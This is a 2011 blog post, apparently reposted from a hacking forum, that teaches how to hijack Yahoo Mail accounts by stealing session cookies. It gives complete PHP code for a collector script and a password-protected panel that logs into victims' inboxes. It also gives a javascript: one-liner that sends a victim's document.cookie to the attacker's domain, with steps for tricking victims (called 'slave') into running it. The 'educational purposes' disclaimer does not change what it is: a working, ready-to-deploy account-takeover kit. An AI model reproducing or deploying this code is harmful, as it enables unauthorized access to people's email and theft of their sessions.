Wednesday, August 24, 2011

Hacking Email Yahoo by Stealing Cookies

FOR EDUCATIONAL PURPOSES ONLY!

Please delete if it is repost....thank you!

First of all lets find out the basic of cookies....
What are session cookies or session IDs?
--->Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Now lets find out how it works:
Just visit yahoo.com. and copy paste below code to your browser URL and click enter (You would get a pop up box showing the cookies)

Code:
javascript:alert(document.cookie);

Now lets go deeper:
Now login to your account and do same thing above code, you would see and notice some more elements added to the cookies. These represent sessions ids.

So it means sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.

But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Here we go this is what we need:
steps for stealing session cookies:
1. Sign Up for an account at any free web hosting site.
2. Now login to your account and go to file manager. And put this files to www folder
a. Name this code as hacked.php
Code:
<?php
$pass = "scifix";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD cookiesTML 1.0 Transitional//EN" "http://www.w3.org/TR/cookiestml1/DTD/cookiestml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/cookiestml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title id=xx>scifix</title>
<link rel="stylesheet" href="s.css" />
<script type="text/javascript" src="j.js"></script><style type="text/css">
<!--
body {
    background-color: white;
}
-->
</style>
<style type=text/css>
#xx{font-family:"Times New Roman" size:30px}
</style>

</head>
<body>
<!---

--->
<div id="header" class="header">

    <td align="left">
      <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
        <tr align="left">
          <td width="50%">&nbsp;</td>
          <td width="50%"> <p align="right"><a href="?"><span class="links"> Refresh | </span></a><a href="?logout=1"><span class="links"> LogOut </span></a>
          </p></td>
        </tr>
      </table>
  </td>
</td>
</div>
<br />
<br />
<br />

<center>
  <font color="black" face="Terminal" size=9 >www.hackforums.net</font>
</center>
<center>
  <font color="blue" size="6" face="Terminal">SCIFIX AT YOUR SERVICE --sharing is learning--</font>
</center>

<br />
<br />
<br />



<div id="wrapper">

  <table cellpadding="0" cellspacing="0" border="0" class="sortable" id="sorter">
    <tr>
      <th width="162"><p><font color="red" >Hacked account (Click to access) </font></p></th>
      <th width="170"><p><font color="red" >Date</font></p></th>
     
      <th width="77"><p><font color="red" >Delete</font></p></th>
  </tr>
  <?php
   if($_GET['logout'] == 1) {
  echo "<script>document.cookie ='pass=; path=/'</script>";
  echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=?\">";
   }

  if(isset($_POST["pass"])) {
echo "<script>document.cookie ='pass=".$_POST['pass']."; path=/'</script>";
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=\">";
                 }
if($_COOKIE['pass'] != $pass) {


        echo '</table></div><div align="center"><b>Enter the password (I hope javascript is on): </b><p><form method="post">' .
             '<input type="password" name="pass"> <input type="submit" name="check" value="Login">' .
             '</form> </div>';
          exit(0);
}



if($_GET['del']) {
        @unlink("./cookies/".$_GET['del']);
                    }

if ($handle = opendir('./cookies/')) {
    while ($file = readdir($handle)) {
        if ($file != "." && $file != ".." && $file != "index.html") {



$fcookie = "./cookies/".$file;
$fh = fopen($fcookie, 'r');
$cookie = fread($fh, filesize($fcookie));

    $T = explode("T=", $cookie); $T = $T[1];
    $T = explode(";", $T); $T = $T[0];

    $Y = explode("Y=", $cookie); $Y = $Y[1];
    $Y = explode(";", $Y); $Y = $Y[0];

    $yid = explode("l=", $Y); $yid = $yid[1];
    $yid = explode("/o", $yid); $yid = $yid[0];

    $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
    $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
    $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};

    $p = substr($Y, strpos($Y, "p=") + 2, 7);
   
    $date = date ("M d Y H:i:s", filemtime("./cookies/".$file));

    $lang = explode("lg=", $Y); $lang = $lang[1];
    $lang = explode("&", $lang); $lang = $lang[0];


    $sr = array(array(";", "&", "="), array(null, "%26", "%3D"));
    $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y);
    $t = "T%3D" . str_replace($sr[0], $sr[1], $T);

echo "<tr><td><a  href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"><b><font color=white size= 5px> ".$id."</font></b></a></td><td>";
echo $date."</td><td>";

echo "<a href=\"?del=".$file."\">Delete it</a></td></tr>";

}
}
    closedir($handle);
}


?>

        </tr>

    </table>
</div>
<script type="text/javascript">
var sorter=new table.sorter("sorter");
sorter.init("sorter",1);
</script>

</body>
</html>

b. Name this code as j.js

 
Code:
var table=function(){
    function sorter(n){
        this.n=n; this.t; this.b; this.r; this.d; this.p; this.w; this.a=[]; this.l=0
    }
    sorter.prototype.init=function(t,f){
        this.t=document.getElementById(t);
        this.b=this.t.getElementsByTagName('tbody')[0];
        this.r=this.b.rows; var l=this.r.length;
        for(var i=0;i<l;i++){
            if(i==0){
                var c=this.r[i].cells; this.w=c.length;
                for(var x=0;x<this.w;x++){
                    if(c[x].className!='nosort'){
                        c[x].className='head';
                        c[x].onclick=new Function(this.n+'.work(this.cellIndex)')
                    }
                }
            }else{
                this.a[i-1]={}; this.l++;
            }
        }
        if(f!=null){
            var a=new Function(this.n+'.work('+f+')'); a()
        }
    }
    sorter.prototype.work=function(y){
        this.b=this.t.getElementsByTagName('tbody')[0]; this.r=this.b.rows;
        var x=this.r[0].cells[y],i;
        for(i=0;i<this.l;i++){
            this.a[i].o=i+1; var v=this.r[i+1].cells[y].firstChild;
            this.a[i].value=(v!=null)?v.nodeValue:''
        }
        for(i=0;i<this.w;i++){
            var c=this.r[0].cells[i];
            if(c.className!='nosort'){c.className='head'}
        }
        if(this.p==y){
            this.a.reverse(); x.className=(this.d)?'asc':'desc';
            this.d=(this.d)?false:true
        }else{
            this.p=y; this.a.sort(compare); x.className='asc'; this.d=false
        }
        var n=document.createElement('tbody');
        n.appendChild(this.r[0]);
        for(i=0;i<this.l;i++){
            var r=this.r[this.a[i].o-1].cloneNode(true);
            n.appendChild(r); r.className=(i%2==0)?'even':'odd'
        }
        this.t.replaceChild(n,this.b)
    }
    function compare(f,c){
        f=f.value,c=c.value;
        var i=parseFloat(f.replace(/(\$|\,)/g,'')),n=parseFloat(c.replace(/(\$|\,)/g,''));
        if(!isNaN(i)&&!isNaN(n)){f=i,c=n}
        return (f>c?1:(f<c?-1:0))
    }
    return{sorter:sorter}
}();

 c. Name this code as c.css

 
Code:
* {margin:0; padding:0}
body {font:10px Verdana,Arial}
#wrapper {width:825px; margin:30px auto}
#header    {width:100%; height:18px; background: repeat-x; text-align:left;}
.sortable {width:823px; border:1px solid white; border-bottom:none}
.sortable th {padding:4px 6px 6px; background:white; color:#fff; text-align:left; color:#ccc}
.sortable td {padding:2px 4px 4px; background:white; border-bottom:1px solid #ccc}

.sortable .head:hover, .sortable .desc:hover, .sortable .asc:hover {color:#fff}
.sortable .even td {background:green}
.sortable .odd td {background:#fff}

.links {
    color: white;
    text-decoration: none;
    text-align: right;
}

a {
    text-decoration: none;
    color: black;
        face: terminal;
}

d. Name this code as yahoo.php

 
Code:
<?php
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


$redirect_to = 'http://yahoo.com';
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

if(!isset($_GET["ex"]) || empty($_GET["ex"]))  {
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$X44."\">";

} else {

$cookie = $_GET['ex'];
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$redirect_to."\">";
$Y = explode("Y=", $cookie); $Y = $Y[1];
$Y = explode(";", $Y); $Y = $Y[0];
$yid = explode("l=", $Y); $yid = $yid[1];
$yid = explode("/o", $yid); $yid = $yid[0];
$str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
$str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
$id = "";
for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};
if ($id != '') {
$rand = rand(0, 1000000);
$fcookie = "./cookies/".$id."_".$rand;
$fh = fopen($fcookie, 'w') or die("chmod???");
fwrite($fh, $cookie);
fclose($fh);
}
}
?>
e. and last create a folder and name it as cookies (just leave it as empty box..this is where cookies are being stored)

3. Now give this code to slave to run in his browser when he would be logged in to his/her yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Note:Here is yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory or folder name as 'cookies'. And remember don't forget to change the code above (http://yourdomain.com) to your domain name as you signed up free web hosting.

When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php

And enter the password (Default password is scifix)

Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.
Now it doesn't matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

good luck guys! anyway use english to indonesian translator to make you easy to understand.........

Disclaimer: I will not be liable for any loss,any physical injury or any lawsuit upon using this tutorial, use at your own risk ^_^

0 comments:

Post a Comment